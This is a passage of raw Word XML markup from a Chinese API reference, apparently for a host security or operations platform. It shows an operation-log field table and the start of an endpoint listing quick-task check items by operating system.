        <w:t xml:space="preserve">            "userName": "dev@xx.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "userType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "responseCode": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "errorInfo": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "eventTime": 1542773554</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 13,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E380CE5"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2223"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="41CC4E5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75385D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4211A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13ABDBE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43201B83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07AF3BFB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E5A8E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>eventId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668DB58E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657AEA4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377B13B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>事件id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DD25047" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689CB504" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>eventType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED95A6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="536F1117" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66EF851B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>事件类型，包括新建、修改、删除、查看、认证、文件、执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C8BD6B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585E63BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>eventName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382579D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10BF2231" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8F6E6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="697102CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BB7F347" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>eventSource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFCE6BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232C31D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71807E0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>事件来源，包括Console、外部api、系统内部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0119BD8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F856E55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE67006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F64520D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66AC7537" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统 1-linux 2-windows 0-通用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AD600FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53890297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>resourceFunction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A35422F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7838D685" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378A972A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>所属主功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C558B06" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EF10F33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>resourceSubFunction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E10C30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349D8686" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A3E8A8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>所属子功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="080D8C5F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C35C8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>requestIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C2019B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C49197" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A12387A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>请求ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="617BAB3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ACEC925" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A073F7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431BC7AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC7F7D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>请求来源区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0234CD39" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6064ABC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>requestId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111EFE16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D065114" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26616A39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>请求id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2838DAAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EB1C63E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>requestParam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450F1DC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF54ECD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DCF893" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>请求参数，为json字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="344D9994" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2829C5F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659C4129" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="367CB715" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69887DC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作帐号名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="459184C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20098049" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278B28DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AB96E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C8F5FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作帐号类型 1-主帐号 2-子帐号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DC9C006" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A9EF9F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>responseCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FE768DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BAEF014" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713D0A87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>响应码 和http返回码相同 200-成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A60F630" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD87E12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F6954DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46E900A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CA7E6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A1CE220" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D15A24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>eventTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E7BF496" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546312B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D17906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发生时间 为秒级时间戳格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="011BC4B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="快速任务"/>
      <w:bookmarkEnd w:id="193"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>快速任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215640DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="获取快速任务检测项列表"/>
      <w:r>
        <w:t>获取快速任务检测项列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502B0A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533FEA9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/task/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56189FD4"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2096"/>
        <w:gridCol w:w="2086"/>
        <w:gridCol w:w="3039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="57C7B25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9B863E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DC7CBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AA3BE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F0C3BAD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23121D74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0900B985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD9D6A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1：linux； 2：windows (必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6638C72A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
